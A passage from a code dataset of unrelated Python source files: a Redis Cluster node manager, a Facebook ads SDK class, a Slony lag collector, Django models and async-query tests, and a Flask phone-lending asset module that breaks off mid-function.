keyslot(self, key):\n \"\"\"\n Calculate keyslot for a given key.\n Tuned for compatibility with python 2.7.x\n \"\"\"\n k = self.encoder.encode(key)\n\n start = k.find(b\"{\")\n\n if start > -1:\n end = k.find(b\"}\", start + 1)\n if end > -1 and end != start + 1:\n k = k[start + 1:end]\n\n return crc16(k) % self.RedisClusterHashSlots\n\n def node_from_slot(self, slot):\n \"\"\"\n \"\"\"\n for node in self.slots[slot]:\n if node['server_type'] == 'master':\n return node\n\n def all_nodes(self):\n \"\"\"\n \"\"\"\n for node in self.nodes.values():\n yield node\n\n def all_masters(self):\n \"\"\"\n \"\"\"\n for node in self.nodes.values():\n if node[\"server_type\"] == \"master\":\n yield node\n\n def random_startup_node(self):\n \"\"\"\n \"\"\"\n random.shuffle(self.startup_nodes)\n\n return self.startup_nodes[0]\n\n def random_startup_node_ittr(self):\n \"\"\"\n Generator that will return a random startup nodes. 
Works as a generator.\n \"\"\"\n while True:\n yield random.choice(self.startup_nodes)\n\n def random_node(self):\n \"\"\"\n \"\"\"\n key = random.choice(list(self.nodes.keys()))\n\n return self.nodes[key]\n\n def get_redis_link(self, host, port, decode_responses=False):\n \"\"\"\n \"\"\"\n allowed_keys = (\n 'host',\n 'port',\n 'db',\n 'username',\n 'password',\n 'socket_timeout',\n 'socket_connect_timeout',\n 'socket_keepalive',\n 'socket_keepalive_options',\n 'connection_pool',\n 'unix_socket_path',\n 'encoding',\n 'encoding_errors',\n 'charset',\n 'errors',\n 'decode_responses',\n 'retry_on_timeout',\n 'ssl',\n 'ssl_keyfile',\n 'ssl_certfile',\n 'ssl_cert_reqs',\n 'ssl_ca_certs',\n 'max_connections',\n )\n disabled_keys = (\n 'host',\n 'port',\n 'decode_responses',\n )\n connection_kwargs = {k: v for k, v in self.connection_kwargs.items() if k in set(allowed_keys) - set(disabled_keys)}\n return Redis(host=host, port=port, decode_responses=decode_responses, **connection_kwargs)\n\n def initialize(self):\n \"\"\"\n Init the slots cache by asking all startup nodes what the current cluster configuration is\n \"\"\"\n nodes_cache = {}\n tmp_slots = {}\n\n all_slots_covered = False\n disagreements = []\n startup_nodes_reachable = False\n\n nodes = self.orig_startup_nodes\n\n # With this option the client will attempt to connect to any of the previous set of nodes instead of the original set of nodes\n if self.nodemanager_follow_cluster:\n nodes = self.startup_nodes\n\n for node in nodes:\n try:\n r = self.get_redis_link(host=node[\"host\"], port=node[\"port\"], decode_responses=True)\n cluster_slots = r.execute_command(\"cluster\", \"slots\")\n startup_nodes_reachable = True\n except (ConnectionError, TimeoutError):\n continue\n except ResponseError as e:\n # Isn't a cluster connection, so it won't parse these exceptions automatically\n message = e.__str__()\n if 'CLUSTERDOWN' in message or 'MASTERDOWN' in message:\n continue\n else:\n raise RedisClusterException(\"ERROR sending 'cluster slots' command to redis server: {0}\".format(node))\n except Exception:\n raise RedisClusterException(\"ERROR sending 'cluster slots' command to redis server: {0}\".format(node))\n\n all_slots_covered = True\n\n # If there's only one server in the cluster, its ``host`` is ''\n # Fix it to the host in startup_nodes\n if (len(cluster_slots) == 1 and len(cluster_slots[0][2][0]) == 0 and len(self.startup_nodes) == 1):\n cluster_slots[0][2][0] = self.startup_nodes[0]['host']\n\n # No need to decode response because Redis should handle that for us...\n for slot in cluster_slots:\n master_node = slot[2]\n\n if master_node[0] == '':\n master_node[0] = node['host']\n master_node[1] = int(master_node[1])\n\n master_node = self.remap_internal_node_object(master_node)\n\n node, node_name = self.make_node_obj(master_node[0], master_node[1], 'master')\n nodes_cache[node_name] = node\n\n for i in range(int(slot[0]), int(slot[1]) + 1):\n if i not in tmp_slots:\n tmp_slots[i] = [node]\n slave_nodes = [slot[j] for j in range(3, len(slot))]\n\n for slave_node in slave_nodes:\n slave_node = self.remap_internal_node_object(slave_node)\n target_slave_node, slave_node_name = self.make_node_obj(slave_node[0], slave_node[1], 'slave')\n nodes_cache[slave_node_name] = target_slave_node\n tmp_slots[i].append(target_slave_node)\n else:\n # Validate that 2 nodes want to use the same slot cache setup\n if tmp_slots[i][0]['name'] != node['name']:\n disagreements.append(\"{0} vs {1} on slot: {2}\".format(\n tmp_slots[i][0]['name'], 
node['name'], i),\n )\n\n if len(disagreements) > 5:\n raise RedisClusterException(\"startup_nodes could not agree on a valid slots cache. {0}\".format(\", \".join(disagreements)))\n\n self.populate_startup_nodes()\n self.refresh_table_asap = False\n\n if self._skip_full_coverage_check:\n need_full_slots_coverage = False\n else:\n need_full_slots_coverage = self.cluster_require_full_coverage(nodes_cache)\n\n # Validate if all slots are covered or if we should try next startup node\n for i in range(0, self.RedisClusterHashSlots):\n if i not in tmp_slots and need_full_slots_coverage:\n all_slots_covered = False\n\n if all_slots_covered:\n # All slots are covered and application can continue to execute\n break\n\n if not startup_nodes_reachable:\n raise RedisClusterException(\"Redis Cluster cannot be connected. Please provide at least one reachable node.\")\n\n if not all_slots_covered:\n raise RedisClusterException(\"All slots are not covered after query all startup_nodes. {0} of {1} covered...\".format(\n len(tmp_slots), self.RedisClusterHashSlots))\n\n # Set the tmp variables to the real variables\n self.slots = tmp_slots\n self.nodes = nodes_cache\n self.reinitialize_counter = 0\n\n def remap_internal_node_object(self, node_obj):\n if not self.host_port_remap:\n # No remapping rule set, return object unmodified\n return node_obj\n\n for remap_rule in self.host_port_remap:\n if 'from_host' in remap_rule and 'to_host' in remap_rule:\n if remap_rule['from_host'] in node_obj[0]:\n # print('remapping host', node_obj[0], remap_rule['to_host'])\n node_obj[0] = remap_rule['to_host']\n\n ## The port value is always an integer\n if 'from_port' in remap_rule and 'to_port' in remap_rule:\n if remap_rule['from_port'] == node_obj[1]:\n # print('remapping port', node_obj[1], remap_rule['to_port'])\n node_obj[1] = remap_rule['to_port']\n\n return node_obj\n\n def increment_reinitialize_counter(self, ct=1):\n for i in range(min(ct, self.reinitialize_steps)):\n self.reinitialize_counter += 1\n if self.reinitialize_counter % self.reinitialize_steps == 0:\n self.initialize()\n\n def cluster_require_full_coverage(self, nodes_cache):\n \"\"\"\n if exists 'cluster-require-full-coverage no' config on redis servers,\n then even all slots are not covered, cluster still will be able to\n respond\n \"\"\"\n nodes = nodes_cache or self.nodes\n\n def node_require_full_coverage(node):\n try:\n r_node = self.get_redis_link(host=node[\"host\"], port=node[\"port\"], decode_responses=True)\n return \"yes\" in r_node.config_get(\"cluster-require-full-coverage\").values()\n except ConnectionError:\n return False\n except Exception:\n raise RedisClusterException(\"ERROR sending 'config get cluster-require-full-coverage' command to redis server: {0}\".format(node))\n\n # at least one node should have cluster-require-full-coverage yes\n return any(node_require_full_coverage(node) for node in nodes.values())\n\n def set_node_name(self, n):\n \"\"\"\n Format the name for the given node object\n\n # TODO: This shold not be constructed this way. 
It should update the name of the node in the node cache dict\n \"\"\"\n if \"name\" not in n:\n n[\"name\"] = \"{0}:{1}\".format(n[\"host\"], n[\"port\"])\n\n def make_node_obj(self, host, port, server_type):\n \"\"\"\n Create a node datastructure.\n\n Returns the node datastructure and the node name\n \"\"\"\n node_name = \"{0}:{1}\".format(host, port)\n node = {\n 'host': host,\n 'port': port,\n 'name': node_name,\n 'server_type': server_type\n }\n\n return (node, node_name)\n\n def set_node(self, host, port, server_type=None):\n \"\"\"\n Update data for a node.\n \"\"\"\n node, node_name = self.make_node_obj(host, port, server_type)\n self.nodes[node_name] = node\n\n return node\n\n def populate_startup_nodes(self):\n \"\"\"\n Do something with all startup nodes and filters out any duplicates\n \"\"\"\n for item in self.startup_nodes:\n self.set_node_name(item)\n\n for n in self.nodes.values():\n if n not in self.startup_nodes:\n self.startup_nodes.append(n)\n\n # freeze it so we can set() it\n uniq = {frozenset(node.items()) for node in self.startup_nodes}\n # then thaw it back out into a list of dicts\n self.startup_nodes = [dict(node) for node in uniq]\n\n def reset(self):\n \"\"\"\n Drop all node data and start over from startup_nodes\n \"\"\"\n self.initialize()\n"} {"ext": "py", "sha": "1a2ef9c250f5b0592f93c3e716253062338b9f44", "content": "# Copyright 2014 Facebook, Inc.\n\n# You are hereby granted a non-exclusive, worldwide, royalty-free license to\n# use, copy, modify, and distribute this software in source code or binary\n# form for use in connection with the web services and APIs provided by\n# Facebook.\n\n# As with any software that integrates with the Facebook platform, your use\n# of this software is subject to the Facebook Developer Principles and\n# Policies [http://developers.facebook.com/policy/]. This copyright notice\n# shall be included in all copies or substantial portions of the software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nfrom facebook_business.adobjects.abstractobject import AbstractObject\nfrom facebook_business.adobjects.abstractcrudobject import AbstractCrudObject\nfrom facebook_business.adobjects.objectparser import ObjectParser\nfrom facebook_business.api import FacebookRequest\nfrom facebook_business.typechecker import TypeChecker\n\n\"\"\"\nThis class is auto-generated.\n\nFor any issues or feature requests related to this class, please let us know on\ngithub and we'll fix in our codegen framework. 
We'll not be able to accept\npull request for this class.\n\"\"\"\n\nclass TargetingGeoLocationLocationCluster(\n AbstractCrudObject,\n):\n\n def __init__(self, fbid=None, parent_id=None, api=None):\n self._isTargetingGeoLocationLocationCluster = True\n super(TargetingGeoLocationLocationCluster, self).__init__(fbid, parent_id, api)\n\n class Field(AbstractObject.Field):\n key = 'key'\n id = 'id'\n\n _field_types = {\n 'key': 'int',\n 'id': 'string',\n }\n @classmethod\n def _get_field_enum_info(cls):\n field_enum_info = {}\n return field_enum_info\n\n\n"} {"ext": "py", "sha": "1a2ef9dc52649c21ee5e5267a735b624d1e5db24", "content": "# coding=utf-8\n\n\"\"\"\nCollect slony metrics from postgresql\n\n#### Dependencies\n\n * psycopg2\n\n#### Example Configuration\n\n```\nenabled = True\n\nhost = localhost\nport = 5432\nslony_node_string = Node [0-9] - [_a-z0-9]*@(.*).example.com\n\n[instances]\n\n[[database1]]\nslony_db = postgres\nslony_schema = _slony\n\n\n[[database2]]\nuser = postgres\npassword = postgres\nslony_db = data_db\nslony_node_string = Node [0-9] - [_a-z0-9]*@(.*).i.example.com\nslony_schema = _data_db\n```\n\n\"\"\"\n\nimport diamond.collector\n\ntry:\n import psycopg2\n import psycopg2.extensions\n psycopg2 # workaround for pyflakes issue #13\nexcept ImportError:\n psycopg2 = None\n\n\nclass SlonyCollector(diamond.collector.Collector):\n\n def get_default_config_help(self):\n config_help = super(SlonyCollector, self).get_default_config_help()\n config_help.update({\n 'host': 'Hostname',\n 'user': 'Username',\n 'password': 'Password',\n 'port': 'Port number',\n 'slony_node_string': 'Regex for SQL SUBSTRING to extract ' +\n 'the hostname from sl_node.no_comment',\n 'instances': 'Subcategory of slony instances that includes the ' +\n 'slony database, and slony schema to be monitored. 
' +\n 'Optionally, user, password and slony_node_string ' +\n 'maybe overridden per instance (see example).'\n })\n return config_help\n\n def get_default_config(self):\n \"\"\"\n Return default config.\n \"\"\"\n config = super(SlonyCollector, self).get_default_config()\n config.update({\n 'path': 'postgres',\n 'host': 'localhost',\n 'user': 'postgres',\n 'password': 'postgres',\n 'port': 5432,\n 'slony_node_string': 'Node [0-9]+ - postgres@localhost',\n 'method': 'Threaded',\n 'instances': {},\n })\n return config\n\n def collect(self):\n if psycopg2 is None:\n self.log.error('Unable to import module psycopg2')\n return {}\n\n instances = self.config['instances']\n # HACK: setting default with subcategory messes up merging of configs,\n # so we only set the default if one wasn't provided.\n if not instances:\n instances = {\n 'default': {\n 'slony_db': 'postgres',\n 'slony_schema': '_postgres',\n }\n }\n\n for name, instance in instances.iteritems():\n host = self.config['host']\n port = self.config['port']\n user = instance.get('user') or self.config['user']\n password = instance.get('password') or self.config['password']\n slony_node_string = instance.get('slony_node_string') or \\\n self.config['slony_node_string']\n slony_db = instance['slony_db']\n slony_schema = instance['slony_schema']\n\n stats = self._get_stats_by_database(\n host, port, user, password, slony_db,\n slony_schema, slony_node_string\n )\n [self.publish(metric, value) for metric, value in stats]\n\n def _get_stats_by_database(self, host, port, user,\n password, db, schema, node_string):\n path = \"slony.%(datname)s.%(metric)s.lag_events\"\n conn = psycopg2.connect(\n host=host,\n user=user,\n password=password,\n port=port,\n database=db)\n\n # Avoid using transactions, set isolation level to autocommit\n conn.set_isolation_level(0)\n\n query = \"\"\"\n SELECT SUBSTRING(sl.no_comment FROM %(node_extractor)s) AS node,\n st.st_lag_num_events AS lag_events\n FROM %(schema)s.sl_status AS st, %(schema)s.sl_node AS sl\n WHERE sl.no_id = st.st_received\n \"\"\"\n cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(query, {\n 'node_extractor': node_string,\n 'schema': psycopg2.extensions.AsIs(schema),\n })\n\n metrics = []\n for row in cursor.fetchall():\n stats = row.copy()\n metrics.append((\n path % {'datname': db, 'metric': stats.get('node')},\n stats.get('lag_events')\n ))\n return metrics\n"} {"ext": "py", "sha": "1a2efa426e0f6d38cb8ae226501c722d38d52bed", "content": "from django.db import models\nfrom accounts.models import User\n\n\nclass ExcelFile(models.Model):\n # user = models.ForeignKey(User, on_delete=models.CASCADE)\n excel_file = models.FileField(blank=True, default='')\n timestamp = models.DateTimeField(auto_now_add=True)\n"} {"ext": "py", "sha": "1a2efa4861e56582ea91b6f361894c41ffe65061", "content": "from unittest import mock\n\nfrom django.conf import settings\nfrom django.test import TestCase, override_settings\n\nfrom daiquiri.jobs.tests.mixins import AsyncTestMixin\nfrom daiquiri.query.models import QueryJob, Example\n\n\n@override_settings(QUERY_ANONYMOUS=True)\n@mock.patch(settings.ADAPTER_DATABASE + '.submit_query', mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + '.fetch_nrows', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.fetch_size', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.count_rows', mock.Mock(return_value=100))\n@mock.patch(settings.ADAPTER_DATABASE + '.rename_table', 
mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + '.drop_table', mock.Mock())\n@mock.patch(settings.ADAPTER_DATABASE + '.create_user_schema_if_not_exists', mock.Mock())\nclass AsyncTestCase(AsyncTestMixin, TestCase):\n\n databases = ('default', 'data', 'tap', 'oai')\n\n fixtures = (\n 'auth.json',\n 'metadata.json',\n 'jobs.json',\n 'queryjobs.json',\n 'examples.json'\n )\n\n users = (\n ('admin', 'admin'),\n ('user', 'user'),\n ('evil', 'evil'),\n ('anonymous', None),\n )\n\n url_names = {\n 'list': 'tap:async-list',\n 'detail': 'tap:async-detail',\n 'results': 'tap:async-results',\n 'result': 'tap:async-result',\n 'parameters': 'tap:async-parameters',\n 'destruction': 'tap:async-destruction',\n 'executionduration': 'tap:async-executionduration',\n 'phase': 'tap:async-phase',\n 'error': 'tap:async-error',\n 'quote': 'tap:async-quote',\n 'owner': 'tap:async-owner'\n }\n\n jobs = QueryJob.objects.filter(owner__username='user')\n\n def get_parameter_for_new_jobs(self, username):\n return [{\n 'LANG': example.query_language,\n 'QUERY': example.query_string\n } for example in Example.objects.filter(access_level='PUBLIC')]\n\n def get_parameter_for_new_jobs_internal(self, username):\n return [{\n 'LANG': example.query_language,\n 'QUERY': example.query_string\n } for example in Example.objects.filter(access_level='INTERNAL')]\n"} {"ext": "py", "sha": "1a2efac3154f2d441117018b9a8e276b2fdc06ab", "content": "import json\nimport traceback\nfrom datetime import timedelta\n\nfrom flask import request, g, current_app\nfrom sqlalchemy import desc, func\n\nfrom apps.auth.models.users import User\nfrom apps.project.business.credit import CreditBusiness\nfrom apps.project.models.assets import Phone, PhoneRecord, VirtualAsset, PhoneBorrow\nfrom apps.project.models.credit import Credit\nfrom apps.public.models.public import Config\nfrom library.api.db import db\nfrom library.api.transfer import transfer2json\nfrom library.notification import notification\nfrom library.trpc import Trpc\n\nuser_trpc = Trpc('auth')\n\n\nclass PhoneBusiness(object):\n public_trpc = Trpc('public')\n user_trpc = Trpc('auth')\n message_trpc = Trpc('message')\n\n @classmethod\n def _query(cls):\n return Phone.query.add_columns(\n Phone.id.label('id'),\n Phone.name.label('name'),\n Phone.asset_id.label('asset_id'),\n Phone.vendor.label('vendor'),\n Phone.device_number.label('device_number'),\n Phone.os.label('os'),\n Phone.cpu.label('cpu'),\n Phone.core.label('core'),\n Phone.ram.label('ram'),\n Phone.rom.label('rom'),\n Phone.resolution.label('resolution'),\n Phone.buy_date.label('buy_date'),\n Phone.region.label('region'),\n Phone.status.label('status'),\n Phone.borrow_id.label('borrow_id'),\n Phone.creator_id.label('creator_id'),\n Phone.device_source.label('device_source'),\n Phone.device_belong.label('device_belong'),\n )\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n '!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def query_all_json(cls, page_size, page_index):\n ret = cls._query().filter(\n Phone.status == Phone.ACTIVE).order_by(\n desc(Phone.id)).limit(int(page_size)).offset(\n int(page_index - 1) * int(page_size)).all()\n return ret\n\n @classmethod\n def query_all_count(cls):\n count = cls._query().filter(Phone.status == Phone.ACTIVE).count()\n return count\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n 
'!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def query_json_by_id(cls, pid):\n return cls._query().filter(\n Phone.id == pid, Phone.status == Phone.ACTIVE).all()\n\n @classmethod\n def get_phone_by_id(cls, pid):\n users = user_trpc.requests(method='get', path='/user')\n phone = cls.query_json_by_id(pid)\n\n if len(phone) <= 0:\n return 101, 'phone not exist!'\n phone = phone[0]\n for user in users:\n if user.get('userid') == phone.get('creator_id'):\n phone['creator_nickname'] = user.get('nickname')\n if user.get('userid') == phone.get('borrow_id'):\n phone['borrow_nickname'] = user.get('nickname')\n return 0, [phone]\n\n @classmethod\n def send_message(cls, user_list, creator, text):\n if cls.message_trpc.requests('post', '/message',\n body={'send_id': creator, 'rec_id': user_list, 'content': text}):\n current_app.logger.info('发送站内信成功')\n else:\n current_app.logger.info('发送站内信失败')\n\n @classmethod\n def get_phone_all(cls, page_size, page_index):\n\n # 通过设备名称进行搜索\n name = request.args.get('name', '')\n # 通过制造商进行搜索\n vendor = request.args.get('vendor', '')\n # 通过系统进行搜索\n os = request.args.get('os', '')\n # 通过分辨率进行搜索\n resolution = request.args.get('resolution', '')\n # 通过借用人进行搜索\n borrower_id = request.args.get('borrower_id')\n # 通过持有人进行搜索\n creator_id = request.args.get('creator_id')\n # 通过 归属\n device_belong = request.args.get('device_belong', '')\n # 通过 来源\n device_source = request.args.get('device_source', '')\n # 通过 归属人\n # 获取所有 手机设备列表\n phones, count = cls.search_phone_all(name, vendor, os, resolution, borrower_id, device_belong,\n device_source, creator_id, page_size, page_index)\n # 获取所有用户的 基本信息\n users = {int(user.get('userid')): user\n for user in user_trpc.requests(method='get', path='/user', query={'base_info': True})}\n # 获取所有借用关系列表\n phone_borrows = {phone_borrow.phone_id: phone_borrow for phone_borrow in PhoneBorrow.query.all()}\n data = []\n for phone in phones:\n phone_borrow = phone_borrows.get(phone.get('id'))\n if g.userid == phone.get('borrow_id'):\n phone[\"move_status\"] = 1\n else:\n phone[\"move_status\"] = 0\n\n if PhoneBusiness.in_confirm_status(phone_borrow):\n phone[\"move_status\"] = 2\n\n if PhoneBusiness.need_confirm_status(phone_borrow):\n phone[\"confirm_status\"] = 0\n else:\n phone[\"confirm_status\"] = 1\n\n try:\n borrower = users.get(phone.get('borrow_id')).get(\"nickname\")\n creator = users.get(phone.get('creator_id')).get('nickname')\n\n phone['borrow_nickname'] = borrower\n phone['creator_nickname'] = creator\n # 有此条借用记录\n if phone_borrow:\n user_list = [int(uid) for uid in phone_borrow.user_list.split(',') if uid != '']\n # 有需要确认的用户\n if phone_borrow.confirm_userid != 0:\n confirm_user_nickname = users.get(phone_borrow.confirm_userid).get('nickname')\n phone['borrow_status'] = f'[{confirm_user_nickname}] 待接收'\n # 用户借用列表\n elif user_list:\n user_list_temp = [users.get(userid).get('nickname') for userid in user_list]\n phone['borrow_status'] = f'[{\",\".join(user_list_temp)}] 申请借用'\n phone['move_status'] = 3 if phone[\"move_status\"] == 1 else 0\n # 无借用、确认、归还\n else:\n phone['borrow_status'] = f'[{borrower}] 持有'\n else:\n phone['borrow_status'] = f'[{borrower}] 持有'\n except Exception as e:\n current_app.logger.error(e)\n phone['borrow_status'] = '未知'\n phone['borrow_nickname'] = '未知'\n\n data.append(phone)\n current_app.logger.info(data)\n return data, count\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n 
'!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def search_phone_json(cls, data):\n return data.all()\n\n @classmethod\n def search_phone_all(cls, name, vendor, os, resolution, borrower_id, device_belong, device_source, creator_id,\n page_size, page_index):\n try:\n\n data_all = cls._query().filter(Phone.status == Phone.ACTIVE)\n if name != '':\n data_all = data_all.filter(Phone.name.like(f'%{name}%'))\n if vendor != '':\n data_all = data_all.filter(Phone.vendor.like(f'%{vendor}%'))\n if os != '':\n data_all = data_all.filter(Phone.os.like(f'%{os}%'))\n if resolution != '':\n data_all = data_all.filter(Phone.resolution.like(f'%{resolution}%'))\n if device_belong != '':\n data_all = data_all.filter(Phone.device_belong.like(f'%{device_belong}%'))\n if device_source != '':\n data_all = data_all.filter(Phone.device_source.like(f'%{device_source}%'))\n if borrower_id:\n data_all = data_all.filter(Phone.borrow_id == borrower_id)\n if creator_id:\n data_all = data_all.filter(Phone.creator_id == creator_id)\n\n count = data_all.count()\n data = cls.search_phone_json(\n data_all.order_by(desc(Phone.id)).limit(int(page_size)).offset(int(page_index - 1) * int(page_size)))\n return data, count\n except Exception as e:\n current_app.logger.error(e)\n\n @classmethod\n def get_holder_json(cls):\n # 获取所有持有者的信息\n try:\n data_all = []\n temp = []\n phones = Phone.query.add_columns(Phone.borrow_id.label('borrow_id')).filter(\n Phone.status == Phone.ACTIVE).all()\n for phone in phones:\n if phone.borrow_id not in temp:\n temp.append(phone.borrow_id)\n user = cls.user_trpc.requests('get', '/user/{}'.format(phone.borrow_id))[0]\n data = {\n 'nickname': user.get('nickname'),\n 'id': user.get('userid')\n }\n data_all.append(data)\n return data_all\n except Exception as e:\n current_app.logger.error(e)\n\n @classmethod\n def can_move_status(cls, phone_id):\n # 判断此设备是否归属于当前用户\n phone = Phone.query.get(phone_id)\n if phone and phone.borrow_id == g.userid:\n return True\n else:\n return False\n\n @classmethod\n def need_confirm_status(cls, phone_borrow):\n # 判断此手机需要是否当前用户确认\n try:\n if phone_borrow is not None:\n if int(phone_borrow.confirm_userid) == g.userid:\n return True\n else:\n return False\n else:\n return False\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 101, str(e)\n\n @classmethod\n def in_confirm_status(cls, phone_borrow):\n # 判断此设备是否存在于确认流程中\n try:\n if phone_borrow is not None:\n if int(phone_borrow.confirm_userid) != 0:\n return True\n return False\n else:\n return False\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 101, str(e)\n\n @classmethod\n def qyweixin_email(cls, user_ids, text):\n if not isinstance(user_ids, list):\n user_ids = [user_ids]\n notification.send_notification(user_ids, text, creator=0)\n return 0, 'success'\n\n @classmethod\n def send_need_confirm_msg(cls, current_phone, phone_current_holder, phone_new_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一台设备需要确认接收:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n请及时到系统中确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n # phone_current_holder 原持有人\n # phone_new_holder 确认人\n\n ret, msg = 
PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_cancel_move_msg(cls, current_phone, phone_current_holder, phone_new_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一台设备由于超过 3 天没有接收,已被系统退回:\n设备 : {},\n资产编号 : {},\n现持有人 : {} (微信号: {})\n\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid, current_phone.name, current_phone.asset_id,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n # phone_current_holder 原持有人\n # phone_new_holder 确认人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_need_move_msg(cls, current_phone, phone_current_holder):\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一条借用请求需要处理:\n设备 : {}\n资产编号 : {}\n请及时到系统中处理!\n请通过 TCloud->资产->流转 进行转出。\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id,\n phone_current_holder.wx_userid)\n\n # phone_current_holder 当前持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_create_msg_qywx(cls, current_phone, phone_holder):\n msg_text = \"\"\"[TCloud] {} ({})\n您拥有了一台新的设备:\n设备 : {},\n资产编号 : {},\n持有人 : {} (微信号: {})\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_holder.nickname,\n phone_holder.wx_userid, )\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n return ret, msg\n\n @classmethod\n def send_delay_msg_qywx(cls, current_phone, phone_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n msg_text = \"\"\"[TCloud] {} ({})\n您拥有的一台设备需要归还:\n设备 : {},\n资产编号 : {},\n持有人 : {} (微信号: {})\n到期时间: {}\n续借 : 请到系统中点击 续借 进行续借\n归还 : 请到系统中点击 退回 进行归还\n过期 2 天后会根据超时时间扣除信用分!请及时归还!\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_holder.nickname,\n phone_holder.wx_userid, deadline)\n\n return PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def send_move_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您的一台设备状态将要发生变化:\n设备 : {},\n资产编号 : {},\n变化 : 持有人将 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 等待接收人确认\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您将拥有一台新的设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\n请及时到系统中确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid, Phone.HOLD_DATE, deadline)\n # phone_current_holder 原持有人\n # phone_new_holder 新持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n 
@classmethod\n def send_move_confirm_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您的一台设备状态发生了变化:\n设备 : {},\n资产编号 : {},\n变化 : 持有人已 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 已接收\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您拥有了一台新的设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\n状态: 已接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid, 